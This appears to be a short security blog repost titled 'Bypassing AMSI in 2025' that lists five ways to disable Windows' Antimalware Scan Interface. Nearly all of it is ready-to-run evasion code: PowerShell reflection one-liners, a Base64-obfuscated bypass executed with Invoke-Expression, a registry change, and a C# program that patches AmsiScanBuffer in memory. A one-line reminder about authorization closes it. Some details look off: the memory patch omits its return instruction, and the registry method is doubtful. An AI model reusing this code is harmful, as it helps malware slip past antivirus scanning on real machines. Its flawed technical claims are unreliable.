Bypassing AMSI in 2025

By /

Listen to this Post

https://lnkd.in/dicZ677j

You Should Know:

Bypassing AMSI (Antimalware Scan Interface) is a critical technique in penetration testing and red teaming. Below are some practical commands and code snippets to help you understand and practice AMSI bypass techniques.

1. Basic AMSI Bypass with PowerShell:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

2. Using Base64 Encoding to Obfuscate AMSI Bypass:

$encoded = "WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkA"
$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
Invoke-Expression $decoded

3. AMSI Bypass via Registry:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI" -Name "Enable" -Value 0

4. Using .NET Reflection to Disable AMSI:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null, $null)

5. AMSI Bypass via Memory Patching:

using System;
using System.Runtime.InteropServices;

class Program
{
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr LoadLibrary(string lpFileName);

[DllImport("kernel32.dll", SetLastError = true)]
static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

static void Main(string[] args)
{
IntPtr hModule = LoadLibrary("amsi.dll");
IntPtr pAddress = GetProcAddress(hModule, "AmsiScanBuffer");
uint oldProtect;
VirtualProtect(pAddress, (UIntPtr)5, 0x40, out oldProtect);
Marshal.WriteByte(pAddress, 0xB8);
Marshal.WriteByte(pAddress + 1, 0x57);
Marshal.WriteByte(pAddress + 2, 0x00);
Marshal.WriteByte(pAddress + 3, 0x07);
Marshal.WriteByte(pAddress + 4, 0x80);
VirtualProtect(pAddress, (UIntPtr)5, oldProtect, out oldProtect);
}
}

What Undercode Say:

Bypassing AMSI is a crucial skill for red teamers and penetration testers. The techniques mentioned above provide a starting point for understanding how AMSI works and how it can be bypassed. However, always ensure you have proper authorization before testing these techniques in any environment. For further reading and advanced techniques, refer to the original article and other cybersecurity resources.

Additional Resources:

References:

Reported By: Omar Aljabr – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅Featured Image

Related Posts: